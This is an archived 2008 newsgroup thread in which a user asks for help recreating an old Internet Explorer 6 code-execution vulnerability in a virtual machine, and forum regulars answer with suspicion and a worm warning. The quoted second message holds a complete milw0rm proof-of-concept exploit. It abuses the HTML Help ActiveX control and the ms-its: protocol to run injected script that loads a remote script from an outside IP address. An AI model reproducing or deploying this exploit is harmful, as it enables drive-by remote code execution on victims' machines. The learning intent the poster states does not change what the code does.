(Msg. 1) Posted: Thu Jun 26, 2008 7:14 am
Post subject: Recreating Old code execution Vulnerability
Archived from groups: microsoft>public>frontpage>programming
I'm trying to recreate an old IE 6.0 vulnerability in a windows XP-SP2 box,
for learning purposes.
I'm using VMware (XP-SP2 unpatched box).
When I browse to my index.htm page I get the following error:
"An error has occurred in the script on this page.
Line: 4
Char: 1
Error: Invalid character
Code: 0
URL: ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm
Do you want to continue running scripts on this page?"
I then punch yes but nothing happens.
This is the code behind my index.htm
(Msg. 2) Posted: Fri Jun 27, 2008 9:07 pm
Post subject: Re: Recreating Old code execution Vulnerability
"Diogo" <Diogo.RemoveThis@discussions.microsoft.com> wrote in message
news:F65BA7DF-C92A-4251-91D9-55AAC129FED6@microsoft.com...
> I'm trying to recreate an old IE 6.0 vulnerability in a windows XP-SP2 box,
> for learning purposes.
> I'm using VMware (XP-SP2 unpatched box).
> When I browse to my index.htm page I get the following error:
>
> "An error has occurred in the script on this page.
> Line: 4
> Char: 1
> Error: Invalid character
> Code: 0
> URL: ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm
> Do you want to continue running scripts on this page?"
>
> I then punch yes but nothing happens.
> This is the code behind my index.htm
>
> "Download this file as well for your own testing: original htm.txt
> http://www.milw0rm.com/down.php?id=723
>
> //str0ke
> -->
>
> <html><head><title>CMDExe - Windows Exploit - Remote code execution with
> parameters - Proof of Concept</title></head><BODY
> style="font-family:Verdana;color:#0000FF;font-size:14px">More info about this
> exploit can be found at <a
> href="http://freehost19.websamba.com/shreddersub7/expl-discuss.htm"
> target="_new">http://freehost19.websamba.com/shreddersub7/expl-discuss.htm</a>. © 2004 ShredderSub7
> <script>
> function DisplayLocStrings() {
> Title.innerHTML = TAG_SYSCONFIG;
> Config_Link.innerHTML = TAG_OPENSYSCONFIG;
> Config_Desc.innerHTML = TAG_SYSCONFIGDESC;
> }
> </script>
> <br><OBJECT style="display:none" id="locate" type="application/x-oleobject"
> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
> codebase="hhctrl.ocx#Version=5,2,3790,1194">
> <PARAM name="Command" value="Related Topics, MENU">
> <PARAM name="Button" value="Text:_">
> <PARAM name="Window" value="$global_blank">
> <PARAM name="Item1"
> value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
> </OBJECT>
> <OBJECT style="display:none" id="locator" type="application/x-oleobject"
> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
> codebase="hhctrl.ocx#Version=5,2,3790,1194">
> <PARAM name="Command" value="Related Topics, MENU">
> <PARAM name="Button" value="Text:_">
> <PARAM name="Window" value="$global_blank">
> <PARAM name="Item1"
> value='command;javascript:execScript("document.write(\"<script
> language=\\\"javascript\\\"
> src=\\\"http://10.10.52.20/htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
>
> </OBJECT>
> <script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html>
>
> // milw0rm.com [2004-12-28]"
>
>
> Could someone help please.
(Msg. 3) Posted: Sat Jun 28, 2008 9:52 pm
Post subject: Re: Recreating Old code execution Vulnerability
I know this might arouse suspicion but we are talking about a vulnerability
from 2004... no one is vulnerable to this and I'm doing this in VMware. I
installed an old XP-SP2 version just to try it out.
I'm trying to learn network security and this example came up...
I've absolutely no malicious intentions, towards anyone.
Could someone help?
(Msg. 4) Posted: Tue Jul 01, 2008 4:40 am
Post subject: Re: Recreating Old code execution Vulnerability
_____________________________________________
SBR @ ENJOY (-: [ Microsoft MVP - FrontPage ]
"Warning - Using the F1 Key will not break anything!" (-;
_____________________________________________
"Diogo" <Diogo.TakeThisOut@discussions.microsoft.com> wrote in message news:C9A21A17-B116-4D1E-9BBD-8A16A2ED2CB6@microsoft.com...
| I know this might arouse suspicion but we are talking about a vulnerability
| from 2004... no one is vulnerable to this and I'm doing this in VMware. I
| installed an old XP-SP2 version just to try it out.
| I'm trying to learn network security and this example came up...
| I've absolutely no malicious intentions, towards anyone.
| Could someone help?
(Msg. 5) Posted: Tue Jul 01, 2008 12:56 pm
Post subject: Re: Recreating Old code execution Vulnerability
methinks he is intentionally experimenting with the black arts.
his post should be removed
--
~~~~~~~~~~~~~~~~~~
Rob Giordano
Microsoft MVP Expression
"Stefan B Rusynko" <sbr_enjoy.TakeThisOut@hotmail.com> wrote in message
news:eJSutY12IHA.2424@TK2MSFTNGP04.phx.gbl...
> Your original post appears to have a virus / worm VBS/Phel.J attached
> (probably because your old XP-SP2 is unpatched)
> - selecting it I get an alert about the following worm
> http://onecare.live.com/standard/en-us/virusenc/virusencinfo.htm?keywo...avencyc
>
> I suspect your old system is compromised
>
> --
>
> _____________________________________________
> SBR @ ENJOY (-: [ Microsoft MVP - FrontPage ]
> "Warning - Using the F1 Key will not break anything!" (-;
> _____________________________________________
>
>
> "Diogo" <Diogo.TakeThisOut@discussions.microsoft.com> wrote in message
> news:C9A21A17-B116-4D1E-9BBD-8A16A2ED2CB6@microsoft.com...
> | I know this might arouse suspicion but we are talking about a vulnerability
> | from 2004... no one is vulnerable to this and I'm doing this in VMware. I
> | installed an old XP-SP2 version just to try it out.
> | I'm trying to learn network security and this example came up...
> | I've absolutely no malicious intentions, towards anyone.
> | Could someone help?
>
>
All times are: Eastern Time (US & Canada)